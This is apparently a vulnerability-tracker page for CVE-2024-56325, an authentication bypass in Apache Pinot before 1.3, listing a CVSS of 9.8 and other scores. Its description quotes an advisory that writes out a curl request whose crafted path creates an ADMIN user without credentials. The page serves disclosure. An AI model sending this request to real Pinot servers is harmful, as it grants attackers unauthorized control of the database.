← Back to browse · API

CVE-2024-56325

Severity
CRITICAL
CVSS
9.8
EPSS
0.78668
Risk score
66.73
CISA KEV
No
PoC
No
Published
2025-04-01
Modified
2025-10-27
First seen
2026-08-07
Aliases
EUVD-2025-9317, GHSA-6JWP-4WVJ-6597
Products
Apache Software Foundation:Apache Pinot 0 <1.3
Sources
euvd EUVD-2025-9317

Description

Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.

References